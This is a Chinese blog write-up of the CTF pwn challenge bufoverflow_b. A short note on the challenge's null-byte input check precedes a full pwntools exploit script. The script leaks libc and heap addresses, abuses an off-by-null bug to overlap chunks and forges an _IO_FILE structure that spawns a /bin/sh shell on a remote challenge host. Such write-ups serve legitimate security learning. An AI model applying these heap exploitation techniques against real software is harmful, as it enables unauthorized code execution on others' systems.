【攻防世界】bufoverflow_b

最新推荐文章于 2022-08-23 20:13:39 发布
最新推荐文章于 2022-08-23 20:13:39 发布
阅读量156 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/115559771
版权

其他部分与 bufoverflow_a一样,但是 b 中多了一个检查:
在这里插入图片描述
这里不能输入空字节,这样的话就不能像 a 中直接布置,这样会破坏掉前面的字段,需要倒着布置。还有一个需要注意的就是,在触发 off by null 时 a 中可以一次性的布置好 pre_size 和 pre_inuse 位,但是在本题中则需要先覆盖 next chunk 的 pre_inuse 位,然后再清理填充的字节,布置 pre_size 位,再触发:

# pad = '1'*0x80 + p64(0x270)
add(0x88) #1
edit('b'*0x88)
clean(0x80)
edit('a'*0x80 + '\x70\x02\x00')
dele(2) # consolidate 0 1 2
完整exp
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from ctypes import *
# context.log_level = 'debug'

binary = './bufoverflow_b'
elf = ELF('./bufoverflow_b')
libc = elf.libc
# libc = ELF("./libc.so.6")
# libc = cdll.LoadLibrary("./libc.so.6")
context.binary = binary

DEBUG = 0
if DEBUG:
	p = process(binary)
else:
	host = "node3.buuoj.cn"
	port =  29870 
	p = remote(host,port)
if DEBUG == 2:
	host = ""
	port = 0
	user = ""
	passwd = ""
	p = ssh(host,port,user,passwd)

def dbg():
    gdb.attach(p)
    pause()

l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num          		:p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia		= lambda                    :p.interactive()

menu = ">> "

def cmd(i):
	ru(menu)
	sl(str(i))

def add(size):
	cmd(1)
	sla("Size: ", str(size))

def dele(idx):
	cmd(2)
	sla("Index: ", str(idx))

def edit(content):
	cmd(3)
	ru("Content: ")
	se(content)

def show():
	cmd(4)

def get_IO_str_jumps():
	IO_file_jumps_offset = libc.sym['_IO_file_jumps']
	IO_str_underflow_offset = libc.sym['_IO_str_underflow']
	for ref_offset in libc.search(p64(IO_str_underflow_offset)):
		possible_IO_str_jumps_offset = ref_offset - 0x20
		if possible_IO_str_jumps_offset > IO_file_jumps_offset:
			print(possible_IO_str_jumps_offset)
			return possible_IO_str_jumps_offset

def clean(offset):
	for i in range(7, -1, -1):
		edit('b'*(offset + i) + '\x00')

add(0x80) #0
add(0x80) #1
dele(0)
dele(1)
add(0x80) #0
show()
libc_base = l64() - libc.sym['__malloc_hook'] - 0x68
info("libc_base", libc_base)
IO_list_all_addr = libc_base + libc.sym['_IO_list_all']
IO_str_jumps_addr = libc_base + get_IO_str_jumps()
system_addr = libc_base + libc.sym['system']
binsh_addr = libc_base + libc.search("/bin/sh").next()

add(0x400) #1
add(0x80) #2

dele(1) #1 -> unsorted bin
add(0x500) #1 unsorted bin -> large bin
dele(1) 

dele(2) # 1,2 -> top_chunk
dele(0) # 0 -> top_chunk
add(0x90) #0
add(0x80) #1
show()
heap_base = u64(p.recvuntil("\n", drop=True).ljust(8, '\x00')) - 0xb0
info("heap_base", heap_base)

dele(0)
dele(1)

# create fake chunk
add(0x208) #0
# fake_chunk = 'a'*0x20
# fake_chunk += p64(0) + p64(0x1e1)
# fake_chunk += p64(heap_base + 0x50) * 2
# fake_chunk = fake_chunk.ljust(0x200, '\x00')
# fake_chunk += p64(0x1e0)
# edit(fake_chunk)
clean(0x200)
edit('a'*0x200 + '\xe0\x01\x00')

clean(0x38)
edit('a'*0x38 + p64(heap_base + 0x50)[0:7])

clean(0x30)
edit('a'*0x30 + p64(heap_base + 0x50)[0:7])

clean(0x28)
edit('a'*0x28 + '\xe0\x01\x00')

add(0x80) #1
add(0xf0) #2
edit('b'*0xf0) # no use
dele(1)

# pad = '1'*0x80 + p64(0x270)
add(0x88) #1
edit('b'*0x88)
clean(0x80)
edit('a'*0x80 + '\x70\x02\x00')
dele(2) # consolidate 0 1 2

add(0x290) #2  split from fake_chunk 
# pad = 'a'*0x1d0 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x101) + '\n'
# edit(pad)
clean(0x268)
pad = 'a'*0x268 + '\x01\x01\x00'
edit(pad)

# clean(0x260)

clean(0x1d8)
pad = 'a'*0x1d8 + '\x91\x00'
edit(pad)

# clean(0x1d0)
dele(1) # first free inside chunk
dele(0)

add(0x290) #0  split from normal chunk
# pad = 'a'*0x20 + p64(0) + p64(0x91) + 'a'*0x80 + p64(0) + p64(0x151) + '\n'
# edit(pad)
clean(0xb8)
pad = 'a'*0xb8 + '\x51\x01\x00'
edit(pad)

# clean(0xb0)

clean(0x28)
pad = 'a'*0x28 + '\x91\x00'
edit(pad)

# clean(0x20)

dele(0) # get outside unsorted bin
dele(2) # get inside unsorted bin
add(0x290) # can control unsortedbin which #2 size =0x90 in it

# fake_file = p64(0) + p64(0x60)
# fake_file += p64(0) + p64(IO_list_all_addr - 0x10)
# fake_file += p64(0) + p64(1)
# fake_file += p64(0) + p64(binsh_addr)
# fake_file = fake_file.ljust(0xd8, '\x00')
# fake_file += p64(IO_str_jumps_addr - 8)
# fake_file += p64(0) + p64(system_addr)

payload = 'a'*0x20
# pl += fake_file
# pl += '\n'
# edit(pl)

start = 0x20
clean(start + 0xE8)
edit(payload + 'a'*0xE8 + p64(system_addr)[0:7])
clean(start + 0xE0)
clean(start + 0xD8)
edit(payload + 'a'*0xD8 + p64(IO_str_jumps_addr - 8)[0:7])
for i in range(0xD0,0x38,-8):
   #print hex(i)
   clean(start + i)
clean(start + 0x38)
edit(payload + 'a'*0x38 + p64(binsh_addr)[0:7])
clean(start + 0x30)
clean(start + 0x28)
edit(payload + 'a'*0x28 + '\x01\x00')
clean(start + 0x20)
clean(start + 0x18)
edit(payload + 'a'*0x18 + p64(IO_list_all_addr-0x10)[0:7])
clean(start + 0x10)
clean(start + 0x8)
edit(payload + 'a'*0x8 + p64(0x60)[0:2])
clean(start + 0)

add(0xa0)
# dbg()

ia()

参考链接

、皮皮鸭
关注
专栏目录
【网络安全 | CTF】攻防世界wife_wife解题详析
等风来
07-23 5320
若isAdmin的属性是true,则它为管理员,否则为普通用户;于是我们可构造污染。该题涉及Java Script原型链污染。可以看到,后端编程语言为Node.js,
攻防世界 m0_01讲解
qq_53105813的博客
07-31 2418
思路总结
攻防世界 pwn 进阶 bufoverflow_b
yongbaoii的博客
03-13 242
bufoverflow_b差不多,就是多了个检查。 所以先看看bufoverflow_a 说跟bufoverflow_a差不多是为啥,因为它就是在输入的时候检查多了一项。 这个是bufoverflow_a 这个是bufoverflow_b 这个题会检查我们的输入是不是\x00,意思是会被\x00截断,那么我们在输入数据的时候就会麻烦一些。 那我们怎么去解决这个烦恼,我们这里利用大佬的方法。 在我们向内存中写地址的时候内存中一定会有一些垃圾数据,我们写数据的时候,假如我们要写入一个地址,在内存中小端序
攻防世界PWN之bufoverflow_b题解
seaaseesa的博客
02-19 774
bufoverflow_b 这题和bufferoverflow_a类似,只是在输入的时候,增加了一个检查 遇到空字符就会截断,这将不利于我们在chunk里伪造数据。 另外增加了一个功能,不过我没有使用到。 遇到’\x00’就会截断,但是我们仍然可以完整的把我们的伪造数据放进去。 比如,我们要在偏移0x30处写一个数据0x0000000000123456,我们先把0x30处的8字节...
Lab1 Buffer OverFlow
Thare_Lam
11-08 1441
Lab OverViewImportant Note: This course’s labs, including this lab, ask you to design exploits and to perform attacks. These exploits and attacks are realistic enough that you might be able to use them
攻防世界bufoverflow_a
weixin_43960998的博客
04-09 272
1.程序逆向 简单的逆向,记一下几个地方:当chunk数大于2时,便使用 calloc 分配并且 free 后会进行填充: 关于 mallopt 见这里。 漏洞出现在 fill 功能中,存在 off by null。 show 输出遇 0 截断。 2.漏洞利用&限制条件 off by null chunk size 无限制 可以泄漏地址 chunk 只有两个 show 遇 ‘\x00’ 截断 可以无限次 edit     由于能够正常 malloc
buffer overflow 分析
hunter
01-17 776
1.打开app 就马上出现buffer overflow的Log, 定位问题的代码段? 1.1 api有问题? 1.2 js有问题?我都没点呢? 1.3字符串相关的位置
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界miss-01,杂项misc太湖杯
11-01
标题 "攻防世界miss-01,杂项misc太湖杯" 暗示这是一个网络安全相关的挑战,特别是关于“攻防世界”平台上的一个名为“miss_01”的问题,该问题分类在“杂项”(misc)类别下,可能涉及多种技术技能。描述中提到的...
攻防世界 Become_a_Rockstar
qq_53105813的博客
08-23 1199
攻防世界wp
攻防世界PWN之bufoverflow_a题解(house of orange in 2.24&house of Einherjar)
seaaseesa的博客
02-19 979
bufoverflow_a 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,是一个经典的增删改查的程序,然后我们看到创建堆时,前两个堆是用malloc创建,后面的堆用calloc创建,这意味着,如果要泄露libc地址,只能靠前两个堆,后面的堆从bin里取出后会清空里面的信息。 Fill功能存在一个null off by one漏洞 我们每次只能对最后创建的那个堆进...
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 336
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
缓冲区溢出(Buffer Overflow
weixin_43129599的博客
11-27 2787
原文地址:https://www.imperva.com/learn/application-security/buffer-overflow/ 什么是缓冲区溢出 缓冲区是内存存储区域,可在数据从一个位置传输到另一个位置时临时保存数据。当数据量超过内存缓冲区的存储容量时,就会发生缓冲区溢出(或缓冲区溢出)。因此,尝试将数据写入缓冲区的程序会覆盖相邻的内存位置。 例如,登录凭证的缓冲区可能被设计为期望输入 8 个字节的用户名和密码,因此如果事务涉及 10 个字节的输入(即比预期多 2 个字节),程序可能会写入
C语言中几种常见的与内存有关的错误
csdn_lgxo
06-25 824
对C程序员来说,管理和使用虚拟内存可能是个困难的、容易出错的任务。与内存有关的错误属于那些最令人惊恐的错误,因为它们在时间上或空间上,经常在距离错误源一段距离之后才表现出来。在这里讨论了几种常见的与内存有关的错误。
(原创)攻击方式学习之(3) - 缓冲区溢出(Buffer Overflow)
weixin_34212189的博客
09-06 1285
堆栈溢出 堆栈溢出通常是所有的缓冲区溢出中最容易进行利用的。了解堆栈溢出之前,先了解以下几个概念: 缓冲区 简单说来是一块连续的计算机内存区域,可以保存相同数据类型的多个实例。 堆栈 堆 栈是一个在计算机科学中经常使用的抽象数据类型。堆栈中的物体具有一个特性:最后一个放入堆栈中的物体总...
缓冲区溢出(buffer overflow)避免方法
热门推荐
刘一凡的博客
07-24 3万+
什么是缓冲区溢出? copy数据进buffer时,数据长度超过buffer中的剩余空间。 缓冲区溢出的危害? 缓冲区溢出,结果随机,可能会导致程序功能不正常,也可能导致程序崩溃。如果受到影响的是其它功能,因为故障现象随机,所以问题通常很难定位。别有用心的攻击者还会利用缓冲区溢出缺陷,覆盖控制变量的内容,接管程序的运行。 详细来说: 读越界时,因为读取到错误的数据,所以可能导致功能不正常,...
搬砖:Buffer Overflow
hunter
01-17 934
Buffer Overflow 卡德尔先生   前言 CS 161 is the voodoo plan of Lord Dirks. Project 1 is the first step. 这个project 1做的我心态爆炸 感觉自己还是不是很懂汇编指令 特别是esp寄存器 基本知识介绍 stackStructure.png 上图是linux x86系列的内存结构。...
SCTF2018 Writeup
dieqiang4646的博客
06-26 1075
_____ _____ _______ ______ / ____|/ ____|__ __| ____| | (___ | | | | | |__ \___ \| | | | | __| ____) | |____ | | | | |_____/ \_____| |_...
【pwn】orw
weixin_43960998的博客
06-19 1794
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
攻防世界guess_num
最新发布
08-31
攻防世界guess_num是一个题目,它要求玩家猜测一个数字并输入。根据引用的结果"cyberpeace{a6473686121bdc644837b076c3207788}",可以猜测这个题目的答案可能是"a6473686121bdc644837b076c3207788"。PIE和ASLR是一些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值